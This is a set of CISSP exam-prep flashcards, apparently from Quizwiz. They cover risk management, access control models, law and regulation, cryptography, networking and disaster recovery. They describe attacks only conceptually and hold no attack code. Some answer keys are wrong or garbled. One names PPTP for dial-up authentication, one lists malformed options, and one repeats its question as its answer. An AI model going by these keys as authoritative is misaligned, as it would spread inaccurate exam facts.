CISSP

Pataasin ang iyong marka sa homework at exams ngayon gamit ang Quizwiz!

Different access control models provide specific types of security measures and functionality in applications and operating systems. What model is being expressed in the graphic that follows? A. Noninterference. B. Biba. C. Bell-LaPadula D. Chinese Wall

D. Chinese wall. Changes based on the user's action.

What is a cipher lock? A. A lock that uses cryptographic keys B. A lock that uses a type of key that cannot be reproduced C. A lock that uses a token and perimeter reader D. A lock that uses a keypad

D. Cipher locks, also known as programmable locks, use keypads to control access into an area or facility. The lock can require a swipe card and a specific combination that's entered into the keypad.

Which of the following is not a necessary characteristic of a kerberos implementation? A. Transparent. B. Scalable C. Reliable D. Cohesive.

D. Cohesive

Kim is a data custodian for her company. She has many duties to perform each day. Which duty would be considered "out of scope" in her position? A. adding new employees to the assigned data classification groups. B. Performing prescribed system maintenance. C. establishing baselines for data purges. D. troubleshooting system problems that affect user productivity.

C. establishing baselines for data purges.

Which of the following disaster recovery tests is the most intrusive to business operations? A. parallel B. simulation C. full-interruption D. checklist

C. full-interruption

The removal of data remanence from media devices is a standard security measure in computing environments. This removal process has many names. Which of the following is not one of them? A. Purging. B. Degaussing. C. Overwriting D. Deleting.

D. Deleting.

The unauthorized disclosure of information defined as secret would by definition result in which of the following levels of damage? A. grave damage to national security. B. Damage to national security. C. Extreme damage to national security. D. Serious damage to national security.

D. Serious damage to national security.

AV * EF

SLE

OECD (Organization for Economic Cooperation and Development)

collection limitation data quality purpose specification use limitation security safeguards openness individual participation Accountability

Risk Management process

frame risk assess risk respond to risk monitor risk

Steganography

the art and science of hiding information by embedding messages within other, seemingly harmless messages

BCP Policy

Framework for building the business continuity plan.

Office of Foreign Assets Control (OFAC)

Maintains a list of countries with which transfers of assets or anything of value including cash, payments, and services may be prohibited.

DoDAF

U.S. department of Defense architecture framework that ensures interoperability of systems to meet military mission goals.

Integrity Controls

controls that reject invalid data inputs, prevent unauthorized data outputs, and protect data and programs against accidental or malicious tampering

FISMA

federal info security management act - US law requires federal agencies to create, document and implement security program

ITADA

makes identity theft a federal crime.

18 USC 2510

wire and electronic communications interception and interception of oral communications

Which of the following is one of the most likely solutions that Susan will come up with and present to her boss? A. Development of standards B. Development of training C. Development of monitoring D. Development of testing

A. Development of standards

What protocol is commonly used to authenticate users on dial-up connections? A. PPTP B. IPSEC. C. CHAP D. L2F

A. PPTP

A(n) ________________ is the graphical representation of data commonly used on websites. It is a skewed representation of characteristics a person must enter to prove that the subject is a human and not an automated tool, as in a software robot. A. anti-spoofing symbol B. CAPTCHA C. spam anti-spoofing symbol D. CAPCHAT

B. A CAPTCHA is a skewed representation of characteristics a person must enter to prove that the subject is a human and not an automated tool, as in a software robot. It is the graphical representation of data.

The operations manager has established that prior to building a server, the employee must first check the inventory to make sure that all the spare parts needed are available, they must sing out those parts, and follow a checklist., finally singing and dating it when done. What has the operations manager created? A. A baseline B. A procedure C. A standard D. A policy.

B. A procedure

John has uncovered a rogue system on the company network that emulates a switch. The software on this system is being used by an attacker to modify frame tag values. Which of the following best describes the type of attack that has most likely been taking place? A. DHCP snooping B. VLAN hopping C. Network traffic shaping D. Network traffic hopping

B. An attacker can have a system act as though it is a switch. The system understands the tagging values being used in the network and the trunking protocols, and can insert itself between other VLAN devices and gain access to the traffic going back and forth. Attackers can also insert tagging values to manipulate the control of traffic at the data link layer.

"Something you know, something you have, and something you are" represents the three possible factors of ________. A. Identification. B. Authentication C. Authorization D. Availability.

B. Authentication

Which is the most valuable technique when determining if a specific security control should be implemented? A. Risk analysis B. Cost/benefit analysis C. ALE results D. Identifying the vulnerabilities and threats causing the risk

B. Cost/benefit analysis

John is reviewing database products. He needs a product that can manipulate a standard set of data for his company's business logic needs. Which of the following should the necessary product implement? A. relational database structure. B. object-relational database structure. C. network database structure. D. Dynamic-static structure.

B. object-relational database structure.

Which of the following is the least important aspect of resource provisioning? A. Ensuring that a new system has been properly secured for deployment B. Ensuring that the hardware being deployed is properly tracked as part of asset management. C. Ensuring that the new resource properly expands enterprise capacity. D. Ensuring that the software being deployed is being properly tracked as part of asset management.

C. Ensuring that the new resource properly expands enterprise capacity.

Though laws with respect to privacy protection may vary between countries and jurisdiction, an organization's policies should consider all of the following except: A. What data is collected. B. With whom the data will be shared. C. How much space will be required for storage. D. When the data will be destroyed.

C. How much space will be required for storage.

Why should employers make sure employees take their vacations? A. They have legal obligation. B. it is part of due diligence. C. It is a way that fraud can be uncovered. D. To ensure the employee does not get burnt out.

C. It is a way that fraud can be uncovered.

Which of the following is a U.S. federal government algorithm developed for creating secure message digests? A. Data Encryption Algorithm B. Digital Signature Standard C. Secure Hash Algorithm D. Data Signature Algorithm

C. SHA was created to generate secure message digests. Digital Signature Standard (DSS) is the standard to create digital signatures, which dictates that SHA must be used. DSS also outlines the digital signature algorithms that can be used with SHA: RSA, DSA, and ECDSA.

Which of the following is not a characteristic of the IEEE 802.11a standard? A. It works in the 5-GHz range. B. It uses the OFDM spread spectrum technology. C. It provides 52 Mbps in bandwidth. D. It covers a smaller distance than 802.11b.

C. The IEEE standard 802.11a uses the OFDM spread spectrum technology, works in the 5-GHz frequency band, and provides bandwidth of up to 54 Mbps. The operating range is smaller because it works at a higher frequency.

What is the process depicted in the illustration below referred to as? A. TCP/IP model B. Layering C. Encapsulation D. OSI model

C. The illustration depicts data moving down the layers of the stack of the TCP/IP model. Application layer data becomes the payload of a TCP segment, by prepending the TCP protocol data to it as a header. The TCP segment becomes an IP packet by prepending the IP protocol data to it as a header. The IP packet becomes an Ethernet frame by prepending the Ethernet protocol data to it as a header. (Also a small footer is attached at this layer, not depicted.) This is referred to as encapsulation.

If a company has been contacted because its mail server has been used to spread spam, what is most likely the problem? A. The internal mail server has been compromised by an internal hacker. B. The mail server in the DMZ has private and public resource records. C. The mail server has e-mail relaying enabled and misconfigured. D. The mail server has SMTP enabled.

C. The mail server has e-mail relaying enabled and misconfigured.

Who has the primary responsibility of determining the classification level for information? A. The functional manager B. Senior management C. The owner D. The user

C. The owner

If implemented properly, a one-time pad is a perfect encryption scheme. Which of the following incorrectly describes a requirement for implementation? A. the pad must be securely distributed and protected and its destination. B. The pad must be made up of truly random values. C. The pad must always be the same length. D. The pad must be used only one time.

C. The pad must always be the same length.

Which of the following statements is true? A. A bottom-up approach to software testing allows interface errors to be detected earlier. B. A top-down approach to software testing allows errors in critical modules to be detected earlier. C. The software test plan and results should be retained as part of the system's permanent documentation. D.Black box software testing is required as part of procedural detail.

C. The software test plan and results should be retained as part of the system's permanent documentation.

The term used to denote a potential cause of an unwanted incident, which may result in harm to a system or organization is A. Vulnerability B. Exploit C. Threat D. Attacker

C. Threat

A database row can be called a(n): A. Denominator B. Attribute C. Tuple D. Record

C. Tuple

Risk management can be very complex and overwhelming it is virtually impossible to consider every possible scenario during a risk analysis, however, there are methods available that can produce better results. Which of the following would provide the best results when carrying out a risk analysis? A. do more qualitative analysis. B. use manual auditing. C. Use existing automated tools D. Focus primarily on critical assets.

C. Use existing automated tools

Water and gas lines should have shutoff values and positive drains. What is a positive drain? A. Water does not go into the drain until a fire has been detected. B. The characteristic ensures that the pipe is unbreakable. C. Water, or gas, flows out instead of in. D. Water, or gas, flows in instead of out.

C. Water, or gas, flows out instead of in.

Which of the following describes the company's approach to risk management? A. Risk transference B. Risk avoidance C. Risk acceptance D. Risk mitigation

D. Risk mitigation

Administrative Law

Facilitate effective government. Hippa.

Business Impact Analysis (BIA)

Maximum tolerable downtime operational disruption and productivity financial considerations regulatory responsibilities reputation

Mandatory Vacation

Two-consecutive weeks of vacation. Because fraud may come to light during a time when they can't cover up the fraud.

Encryption

protects against data breaches.

ITAR

defense articles. firearms, tanks, submarines.

MD5 produces a ________ bit has value

128-bit

Which of the following is not a form of identification? A.Token device B. Fingerprint C. User ID. D. Badge systems.

A.Token device

Fault Tree Analysis

Approach to map specific flaws to root causes in complex systems.

Confidentiality

Encryption for data at rest (whole disk, database encryption) Encryption for data in transit (ipsec, tls, pptp, ssh) Access control (physical and technical)

Availability

Ensure that information and systems are available for authorized users when needed.

Denial Attacks

Seek to undermine availability

NIST SP 800-53

Set of controls to protect U.S. federal systems developed by the national institute of standards and technology.

COSO Internal Control- Integrated Framework

Set of internal corporate controls to help reduce the risk of financial fraud developed by the committee of sponsoring organizations (COSO) of the treadway commission

18 USC 2701

Stored wire and Electronic Communications and Transactional Records access.

Due Dilligence

Taking reasonable measures to investigate security risks.

Threats X vulnerability X asset value

Total Risk

Qualitative Risk Analysis

a subjective approach to determine the likelihood that a risk will actually occur and the impact to the project if it does occur.

Frame relay is a simplified version of ____ A. DSL. B. x.25. C. ISDN D. SDLC.

b. x.25

A database row can be called an A. denominator B. Attribute C. tuple D. record

c. tuple.

Procedures

detailed step-by-step tasks that should be performed to achieve a certain goal.

The number of violations that will be accepted or forgiven before a violation record is produced is called the: A. clipping level. B. Acceptance level C. Forgiveness level D. Water level

A. Clipping level.

CERTs primary objective is what? A. Computer crime emergency response and notification. B. Software piracy. C. internet health and growth D. International compatibility and e-commerce activities.

A. Computer crime emergency response and notification.

Block ciphers use which of the following to perform mathematical functions, substitution, and permutations on message bits? A. s-boxes B. Certificates C. key stream D. initialization vectors.

A. s-boxes

Sam plans to establish mobile phone service using the personal information he has stolen from his former boss. What type of identity theft is this? A. Phishing. B. True name. C. Pharming. D. Account Takeover.

B. True Name.

Bob needs to review the source code of a new product a team has been working on, in order to ensure that all user inputs have been properly validated prior to being processed. Which of the following terms is used to describe this activity? A. Dynamic analysis. B. Static Analysis. C. Fuzzing D. Debugging.

B. Static Analysis.

Which of the following network topologies is composed of a single cable that runs the entire length of the network upon which each node resides, and in which each station can observe and hence accept or ignore each packet sent? A. ring topology. B. Linear bus topology. C. Tree topology. D. Star topology.

B. Linear bus topology.

Six Sigma

Business management strategy that can be used to carry out process improvement

Establishing data classification levels within a company is essential as part of an overall security program. of the roles listed, who would be the best choice to sponsor a data classification program? A. IT administrator. B. Security officer. C. Chief Information officer. D. Security Awareness trainer.

C. Chief Information officer.

What is the annualized rate of occurrence (ARO)? A. 1 B. 10 C. 1 D. 01

C. 1

GDPR

Consent Right to be informed Right to restrict processing Right to be forgotten Data breaches

Which of the following is not a benefit of the diameter protocol? A. allows for different services to be authenticated in one architecture instead of individual architectures. B. allows for the use of Mobile IP in an existing environment. C. Relieves the restriction of only being able to authenticate users over PPP and SLIP connections. D. increases customer cost because of the different policy servers that must be maintained.

D. increases customer cost because of the different policy servers that must be maintained.

GLBA (Gramm-Leach-Bliley Act)

Federal law enacted in 1999 to control the ways that financial institutions deal with the private information of individuals

Private Regulations

Flow from contractual relationships. PCI-DSS.

SABSA model

Model and methodology for the development of information security enterprise architectures.

Zachman Framework

Model for the development of enterprise architectures developed by John Zachman. What, how, where, who, when, and why.

Agreement Types

Negotiated contracts. click-through agreements. -- take it or leave it. shrink-wrap agreements. --included on physical software.

Security Procedures

Outline a step-by-step process for an activity. may require compliance, depending upon circumstances.

Pertaining to the network architecture described in the previous scenario, which of the following attack types should Brad be concerned with? A. Parameter validation attack B. Injection attack C. Cross-site scripting D. Database connector attack

Pertaining to the network architecture described in the previous scenario, which of the following attack types should Brad be concerned with? A. Parameter validation attack B. Injection attack C. Cross-site scripting D. Database connector attack

Least Privilege

a principle that users be granted the privilege for some activity only if there is a justifiable need to grant this authorization

Susan, an attorney, has been hired to fill a new position at Widgets, inc.;; chief privacy officer (CPO). What is the primary function of her new role? A. Ensuring the protection of partner data b. Ensuring the accuracy and protection of company financial information c. Ensuring the security policies are defined and enforced. d. ensuring the protection of customer, company, and employee data.

d. ensuring the protection of customer, company, and employee data.

Export Administration Regulations (EAR)

regulations designed to control the export and re-export of most commercial items. EAR restrictions vary from country to country, and embargoed countries such as Cuba, North Korea, Sudan, Syria and Iran are prohibited from receiving US exports. EAR does not control all goods, services, and technologies, however.

Trademarks

words, symbols, names or devices used to specify goods and to differentiate them from others. Granted upon registration. Provided for renewable 10-year periods. granted contingent upon active use in commerce.

Which of the following is the most common attack on DNS servers? A. posoning B. flood C. ping. D. masquerading

A. Poisoning.

Which of the following is not a result of a penetration test? A. modify access control permissions. B. Identify network vulnerabilities C. Evaluate IDS effectiveness D. Evaluate incident response procedures.

A. modify access control permissions.

Preventive: Physical

Badges, swipe cards Guards, dogs Fences, locks, mantraps

Which of the following statements is true about the application layer protocols? A. SNMP uses TCP port 25. B. HTTP uses TCP ports 80 and 445 C. FTP uses TCP port 21 and often TCP port 20 as well. D. DNS only uses UDP port 53.

C. FTP uses TCP port 21 and often TCP port 20 as well.

The Ministry of Defence Architecture Framework

Makes sure all data is presented in the right format.

Capability Maturity Model Integration

Organizational development for process improvement developed by Carnegie Mellon University.

NIST SP 800-39

Organizational tier business process tier information systems tier

Preventive: Technical

Passwords, biometrics, smart cards Encryption, secure protocols, call-back systems, database views, constrained user interfaces. Antimalware software, access control lists, firewalls, intrusion prevention systems.

HITECH

Privacy laws related to electronic transmission of health information

Risk

Risk= threat X Impact x probability

Intellectual property Protections

copyrights trademarks patents trade secrets

due dilligence objective

detect problems

Don't make the policy too specific

don't make policy too specific

Policies and standards are mandatory

guidelines are optional

Ethics

isc2 has it's own code of ethics.

Security Guidelines

provide security advice to the organization. follow best practices from industry. compliance guidelines are not mandatory.

Enterprise Security Architecture

studies the enterprise architecture and business environment to develop an overall strategy and plan that best fits enterprise specific needs

COBIT 5

A business framework to allow for IT enterprise management and governance that was developed by information systems audit and control association (ISACA)

When would an investigator's notebook be admissible in court? A. when he uses it to refresh memory B. when he cannot be present for testimony C. when requested by the judge to learn the original issues of the investigation D. when no other physical evidence is available.

A.

Use the following scenario to answer Questions 19-21. A company has an e-commerce website that carries out 60 percent of its annual revenue. Under the current circumstances, the annualized loss expectancy for a website against the threat of attack is $92,000. After implementing a new application-layer firewall, the new annualized loss expectancy would be $30,000. The firewall costs $65,000 per year to implement and maintain. How much does the firewall save the company in loss expenses? A. $62,000 B. $3,000 C. $65,000 D. $30,000

A. $62,000

When should a Class C fire extinguisher be used instead of a Class A fire extinguisher? A. When electrical equipment is on fire B. When wood and paper are on fire C. When a combustible liquid is on fire D. When the fire is in an open area

A. A Class C fire is an electrical fire. Thus, an extinguisher with the proper suppression agent should be used. The following table shows the fire types, their attributes, and suppression methods: Fire Class Type of Fire Elements of Fire Suppression Method A Common combustibles Wood products, paper, and laminates Water, foam B Liquid Petroleum products and coolants Gas, C02, foam, dry powders C Electrical Electrical equipment and wires Gas, C02, dry powders D Combustible metals Magnesium, sodium, potassium Dry powder

Sue has been asked to install a web access management (WAM) product for her company's environment. What is the best description for what WAMs are commonly used for? A. Control external entities requesting access to internal objects B. Control internal entities requesting access to external objects C. Control external entities requesting access through X.500 databases D. Control internal entities requesting access through X.500 databases

A. A WAM product allows an administrator to configure and control access to internal resources. This type of access control is commonly put in place to control external entities requesting access. The product may work on a single web server or a server farm.

Of the following, what is the primary item that a capability table is based upon? A. A subject B. An object C. A product D. An application

A. A capability table specifies the access rights a certain subject possesses pertaining to specific objects. A capability list (also referred to as a capability table) is different from an access control list (ACL) because the subject is bound to the capability table, whereas the object is bound to the ACL. A capability can be in the form of a token, ticket, or key. When a subject presents a capability component, the operating system (or application) will review the access rights and operations outlined in the capability component and allow the subject to carry out just those functions. A capability component is a data structure that contains a unique object identifier and the access rights the subject has to that object. The object may be a file, array, memory segment, or port.

Use the following scenario to answer Questions 30-32. Tanya is working with the company's internal software development team. Before a user of an application can access files located on the company's centralized server, the user must present a valid one-time password, which is generated through a challenge/response mechanism. The company needs to tighten access control for these files and reduce the number of users who can access each and every file. The company is looking to Tanya and her team for solutions to better protect the data that has been classified and deemed critical to the company's missions. Tanya has also been asked to implement a single sign-on technology for all internal users, but she does not have the budget to implement a public key infrastructure. Which of the following best describes what is currently in place? A. Capability-based access system B. Synchronous tokens that generate one-time passwords C. RADIUS D. Kerberos

A. A capability-based access control system means that the subject (user) has to present something, which outlines what it can access. The item can be a ticket, token, or key. A capability is tied to the subject for access control purposes. A synchronous token is not being used, because the scenario specifically states that a challenge\response mechanism is being used, which indicates an asynchronous token.

Databases and applications commonly carry out the function that is illustrated in the graphic that follows. Which of the following best describes the concept that this graphic is showing? A. Checkpoint B. Commit C. Two-phase commit D. Data dictionary

A. A checkpoint is used to recover data if there is a system failure or problem during a transaction. It is used to periodically save the state of the application and the user's information. It is used so that if the application endures a glitch, it has the necessary tools to bring the user back to his working environment without losing any data. You can experience this with a word processor when it asks you if you want to review the recovered version of a file you were working on. The word processor has saved your document as you have worked on it and is able to bring it back in case the system runs into trouble.

Of the following plans, which establishes senior management and a headquarters after a disaster? A. Continuity of operations plan B. Cyber-incident response plan C. Occupant emergency plan D. IT contingency plan

A. A continuity of operations (COOP) plan establishes senior management and a headquarters after a disaster. It also outlines roles and authorities, orders of succession, and individual role tasks. Creating a COOP plan begins with assessing how the organization operates to identify mission-critical staff, materials, procedures, and equipment. If one exists, review the business process flowchart. Identify suppliers, partners, contractors, and other businesses the organization interacts with on a daily basis, and create a list of these and other businesses the organization could use in an emergency. It is important for an organization to make plans for what it will do if the building becomes inaccessible.

Which of the following dictates that all evidence be labeled with information indicating who secured and validated it? A. Chain of custody B. Due care C. Investigation D. Motive, opportunity, and means

A. A crucial piece in the digital forensics process is keeping a proper chain of custody of the evidence. Because evidence from these types of crimes can be very volatile and easily dismissed from court due to improper handling, it is important to follow very strict and organized procedures when collecting and tagging evidence in every single case. Furthermore, the chain of custody should follow evidence through its entire life cycle, beginning with identification and ending with its destruction, permanent archiving, or return to owner. When copies of data need to be made, this process must meet certain standards to ensure quality and reliability. Specialized software for this purpose can be used. The copies must be able to be independently verified and must be tamperproof. Each piece of evidence should be marked in some way with the date, time, initials of the collector, and a case number if one has been assigned. The piece of evidence should then be sealed in a container, which should be marked with the same information. The container should be sealed with evidence tape, and if possible, the writing should be on the tape so that a broken seal can be detected.

Which of the following best describes how a digital signature is created? A. The sender encrypts a message digest with his private key. B. The sender encrypts a message digest with his public key. C. The receiver encrypts a message digest with his private key. D. The receiver encrypts a message digest with his public key.

A. A digital signature is a hash value that has been encrypted with the sender's private key. The act of digital signing means encrypting the message's hash value with a private key. If Sam wants to ensure that the message he sends to Debbie is not modified and he wants her to be sure it came only from him, he can digitally sign the message. This means that a one-way hashing function would be run on the message, and then Sam would encrypt that hash value with his private key. When Debbie receives the message, she will perform the hashing function on the message and come up with her own hash value. Then she will decrypt the sent hash value (digital signature) with Sam's public key. She then compares the two values, and if they are the same, she can be sure the message was not altered during transmission. She is also sure the message came from Sam because the value was encrypted with his private key.

Which of the following is true with respect to distributed systems? A. A client/server system is a special case of a distributed system with only two tiers. B. Distributed systems are easier to secure than non-distributed systems, because there are more components that can contribute to the security solution. C. A client/server system is distinct from distributed systems, because there are only two tiers. D. Distributed systems reduce the complexity of security solutions.

A. A distributed system is any system with multiple computing nodes, and this includes simple two-node client/server systems.

What type of infrastructural setup is illustrated in the graphic that follows? A. Hot site B. Warm site C. Cold site D. Reciprocal agreement

A. A hot site is a facility that is leased or rented and is fully configured and ready to operate within a few hours. The only missing resources from a hot site are usually the data, which will be retrieved from a backup site, and the people who will be processing the data. The equipment and system software must absolutely be compatible with the data being restored from the main site and must not cause any negative interoperability issues. A hot site is a good choice for a company that needs to ensure a site will be available for it as soon as possible.

IP telephony networks require the same security measures as those implemented on an IP data network. Which of the following is unique to IP telephony? A. Limiting IP sessions going through media gateways B. Identification of rogue devices C. Implementation of authentication D. Encryption of packets containing sensitive information

A. A media gateway is the translation unit between disparate telecommunications networks. VoIP media gateways perform the conversion between time-division multiplexing (TDM) voice to Voice over Internet Protocol (VoIP). As a security measure, the number of calls via media gateways should be limited. Otherwise, media gateways are vulnerable to denial-of-service attacks, hijacking, and other types of attacks

Alice's company has decided to bulk mail post cards to their current and prospective customers, in hopes that they will return them along with feedback as to the services the company provides. She has been tasked with designing and developing the system that will be used to process the information returned, and has been instructed to ensure that it will be most useful to direct management's business decisions for the next year. It is clear that automation will be required, including scanning of the returned post cards, and likely some amount of optical character recognition to enable text-based processing of the responses. Given this scenario, which of the following statements is true? A. A project risk analysis will consider the organization's ability to process the returned information in a useful way. B. A security risk analysis will consider the organization's ability to process the returned information in a useful way. C. No standards exist for risk assessment for a project of this type. D. The PCI-DSS should be consulted for the processing of customer feedback.

A. A project risk analysis will consider the organization's ability to process the returned information in a useful way.

Which of the following does not describe a reciprocal agreement? A. The agreement is enforceable. B. It is a cheap solution. C. It may be able to be implemented right after a disaster. D. It could overwhelm a current data processing site.

A. A reciprocal agreement is not enforceable, meaning that the company that agreed to let the damaged company work out of its facility can decide not to allow this to take place. A reciprocal agreement is a better secondary backup option if the original plan falls through.

A ____________ is the amount of time it should take to recover from a disaster, and a ____________ is the amount of data, measured in time, that can be lost and be tolerable from that same event. A. recovery time objective, recovery point objective B. recovery point objective, recovery time objective C. maximum tolerable downtime, work recovery time D. work recovery time, maximum tolerable downtime

A. A recovery time objective (RTO) is the amount of time it takes to recover from a disaster, and a recovery point objective (RPO) is the amount of data, measured in time, that can be lost and be tolerable from that same event. The RPO is the acceptable amount of data loss measured in time. This value represents the earliest point in time by which data must be recovered. The higher the value of data, the more funds or other resources that can be put into place to ensure a smaller amount of data is lost in the event of a disaster. RTO is the maximum time period within which a business process must be restored to a designated service level after a disaster to avoid unacceptable consequences associated with a break in business continuity.

If a company has a high turnover rate, which accesses control structure is best? A. Role-based B. Decentralized C. Rule-based D. Discretionary

A. A role-based structure is easier on the administrator because she only has to create one role, assign all of the necessary rights and permissions to that role, and plug a user into that role when needed. Otherwise, she would need to assign and extract permissions and rights on all systems as each individual came and left the company.

if a cipher lock has a door delay option, what does that mean? A. After a door is open for a specific period, the alarm goes off. B. It can only be opened during emergency situations. C. It has a hostage alarm capability. D. It has supervisory override capability.

A. A security guard would want to be alerted when a door has been open for an extended period. It may be an indication that something is taking place other than a person entering or exiting the door. A security system can have a threshold set so that if the door is open past the defined time period, an alarm sounds.

What is the ISO/IEC 27799 standard? A. A standard on how to protect personal health information B. The new version of BS 17799 C. Definitions for the new ISO 27000 series D.The new version of NIST SP 800-60

A. A standard on how to protect personal health information

Which of the following does NOT describe privacy-aware role-based access control? A. It is an example of a discretionary access control model. B. Detailed access controls indicate the type of data that users can access based on the data's level of privacy sensitivity. C. It is an extension of role-based access control. D. It should be used to integrate privacy policies and access control policies.

A. A system that uses discretionary access control (DAC) enables the owner of the resource to specify which subjects can access specific resources. This model is called discretionary because the control of access is based on the discretion of the owner. Many times department managers, or business unit managers, are the owners of the data within their specific department. Being the owner, they can specify who should have access and who should not. Privacy-aware role-based access control is an extension of role-based access control (RBAC). There are three main access control models: DAC, mandatory access control (MAC), and RBAC. Privacy-aware role-based access control is a type of RBAC, not DAC.

There are different types of biometric systems in the industry today. Some make authentication decisions based on behavior and some make authentication decisions based on physical attributes. Which of the following is the best description of their differences? A. A system that uses physical attributes provides more accuracy than one that uses behavior attributes B. A system that uses behavior attributes provides more accuracy than one that uses physical attributes. C. A fingerprint system is an example of a physical attribute and an iris system is an example of a behavior system. D. A voice print system is an example of a behavior and signature dynamics is an example of a physical attribute.

A. A system that uses physical attributes provides more accuracy than one that uses behavior attributes

What is true about a transponder? A. It is a card that can be read without sliding it through a card reader. B. It is a biometric proximity device. C. It is a card that a user swipes through a card reader to gain access to a facility. D. It exchanges tokens with an authentication server.

A. A transponder is a type of physical access control device that does not require the user to slide a card through a reader. The reader and card communicate directly. The card and reader have a receiver, transmitter, and battery. The reader sends signals to the card to request information. The card sends the reader an access code.

There are many types of viruses that hackers can use to damage systems. Which of the following is not a correct description of a polymorphic virus? A. Intercepts antimalware's call to the operating system for file and system information B. Varies the sequence of its instructions using noise, a mutation engine, or random-number generator C. Can use different encryption schemes requiring different decryption routines D. Produces multiple varied copies of itself

A. A tunneling virus—not a polymorphic virus—attempts to install itself under an antimalware program. When the antimalware conducts its health check on critical files, file sizes, modification dates, etc., it makes a request to the operating system to gather this information. If the virus can put itself between the antimalware and the operating system, then when the antimalware sends out a system call for this type of information, the tunneling virus can intercept the call and respond with information that indicates the system is free of virus infections. The polymorphic virus also attempts to fool antimalware scanners, but it does so by producing varied but operational copies of itself. Even if antimalware software finds and disables one or two copies, other copies may still remain active within the system

A change management process should include a number of procedures. Which of the following incorrectly describes a characteristic or component of a change control policy? A. Changes that are unanimously approved by the change control committee must be tested to uncover any unforeseen results. B. Changes approved by the change control committee should be entered into a change log. C. A schedule that outlines the projected phases of the change should be developed. D. An individual or group should be responsible for approving proposed changes.

A. A well-structured change management process should be put into place to aid staff members through many different types of changes to the environment. This process should be laid out in the change control policy. Although the types of changes vary, a standard list of procedures can help keep the process under control and ensure it is carried out in a predictable manner. All changes approved by the change control committee (not just those unanimously approved) must be fully tested to uncover any unforeseen results. Depending on the severity of the change and the company's organization, the change and implementation may need to be presented to a change control committee. This helps show different sides to the purpose and outcome of the change and the possible ramifications.

Which of the following types of vulnerabilities CANNOT be discovered in the course of a routine vulnerability assessment? A. Zero-day vulnerability B. Kernel flaw C. Buffer overflow D. File and directory permissions

A. A zero-day vulnerability is one that has been discovered by a potential adversary but has not yet been publicly disclosed, and as such is being kept in "escrow." By this very definition, it is a type of flaw that cannot be tested for by any technical means as part of a routine test, but rather must be discovered independently.

A WAN Technology that uses 53-byte cells and has low delay levels is called: A. ATM B. Frame Relay C. X.25 D. SMDS.

A. ATM.

A WAN technology that uses 53-byte cells and has low delay levels is called: A. ATM B. Frame relay C. x.25 D. SMDS

A. ATM.

What are the purposes of attribute value pairs and how do they differ between radius and diameter? A. AVPs are constructs that outline how two entities will communicate. Diameter has many more AVPs which allow for the protocol to have more capabilities than RADIUS. B. AVPs are protocol parameters used between communicating entities. Diameter has less AVPs which allow for the protocol to have more capabilities than RADIUS. C. AVPs are the security mechanisms that provide confidentiality and integrity for data being passed back and forth between entities. Diameter has many more AVPs, which allow for the protocol to have more security capabilities than RADIUS. D. AVPs are part of the TCP protocol. Diameter uses AVPs, because it uses TCP and RADIUS uses UDP.

A. AVPs are constructs that outline how two entities will communicate. Diameter has many more AVPs which allow for the protocol to have more capabilities than RADIUS.

Many operating systems implement address space layout randomization (ASLR). Which of the following best describes this type of technology? A. Randomly arranging memory address values B. Restricting the types of processes that can execute instructions in privileged mode C. Running privileged instructions in virtual machines D. Randomizing return pointer values

A. Address space layout randomization (ASLR) is a control that involves randomly arranging processes' address space and other memory segments. ASLR makes it more difficult for an attacker to predict target addresses for specific memory attacks

Uncovering restricted information by using permissible data is referred to as____. A. inference B. data mining C. perturbation D. cell suppression

A. Aggregation and inference go hand in hand. For example, a user who uses data from a public database in order to figure out classified information is exercising aggregation (the collection of data) and can then infer the relationship between that data and the data he does not have access to. This is called an inference attack.

Which operating systems allows users to temporarily elevate their privileges in order to launch an application at a higher privilege level? A. All major desktop operating systems B. Recent versions of Windows C. Linux and Windows D. Recent versions of macOS

A. All major operating systems allow for the temporary elevation of user privileges, but macOS and some versions of Linux require the user to do so from a terminal window.

When is a security guard the best choice for a physical access control mechanism? A. When discriminating judgment is required B. When intrusion detection is required C. When the security budget is low D. When access controls are in place

A. Although many effective physical security mechanisms are on the market today, none can look at a situation, make a judgment about it, and decide what the next step should be. A security guard is employed when a company needs to have a countermeasure that can think and make decisions in different scenarios.

Jay is the security administrator at a credit card processing company. The company has many identity stores, which are not properly synchronized. Jay is going to oversee the process of centralizing and synchronizing the identity data within the company. He has determined that the data in the HR database will be considered the most up-to-date data, which cannot be overwritten by the software in other identity stores during their synchronization processes. Which of the following best describes the role of this database in the identity management structure of the company? A. Authoritative system of record B. Infrastructure source server C. Primary identity store D. Hierarchical database primary

A. An authoritative system of record (ASOR) is a hierarchical tree-like structure system that tracks subjects and their authorization chains. The authoritative source is the "system of record," or the location where identity information originates and is maintained. It should have the most up-to-date and reliable identity information.

Which of the following is not an effective countermeasure against spam? A. Open mail relay servers B. Properly configured mail relay servers C. Filtering on an e-mail gateway D. Filtering on the client

A. An open mail relay server is not an effective countermeasure against spam; in fact, spammers often use them to distribute spam, as they allow an attacker to mask their identity. An open mail relay is an SMTP server that is configured to allow inbound SMTP connections from anyone and to anyone on the Internet. This is how the Internet was originally set up, but many relays are now properly configured to prevent attackers from using them to distribute spam or pornography.

Which of the following is not an effective countermeasure against spam? A. Open mail relay servers B.Properly configured mail relay servers C.Filtering on an e-mail gateway D. Filtering on the client

A. An open mail relay server is not an effective countermeasure against spam; in fact, spammers often use them to distribute spam, as they allow an attacker to mask their identity. An open mail relay is an SMTP server that is configured to allow inbound SMTP connections from anyone and to anyone on the Internet. This is how the Internet was originally set up, but many relays are now properly configured to prevent attackers from using them to distribute spam or pornography.

Which of the following access control mechanisms gives you the most granularity in defining access control policies? A. Attribute-based access control (ABAC) B. Role-based access control (RBAC) C. Mandatory access control (MAC) D. Discretionary access control (DAC)

A. Attribute-based access control (ABAC) is based on attributes of any component of the system. It is the most granular of the access control models.

Which of the following terms refers to the number of bits of information that can be transmitted over a link within a second? A. bandwidth. B. Throughput. C. megabits per second (mbps) D. Kilobits

A. Bandwidth.

Which of the following is an advantage of using third-party auditors? A. They may have knowledge that an organization wouldn't otherwise be able to leverage. B. Their cost. C. The requirement for NDAs and supervision. D. Their use of automated scanners and reports.

A. Because they perform audits in multiple other organizations, and since their knowledge is constantly refreshed, third-party auditors almost always have knowledge and insights that would otherwise be unavailable to the organization.

A new software development company has been launched to create mobile device apps for different customers. The company has talented software programmers employed, but has not been able to implement standardized development processes that can be improved upon over time. Which of the following would be the best approach for this company to take in order to improve its software development processes? A. Capability Maturity Model Integration B. System development life cycle C. ISO/IEC 27002 D. Certification and accreditation processes

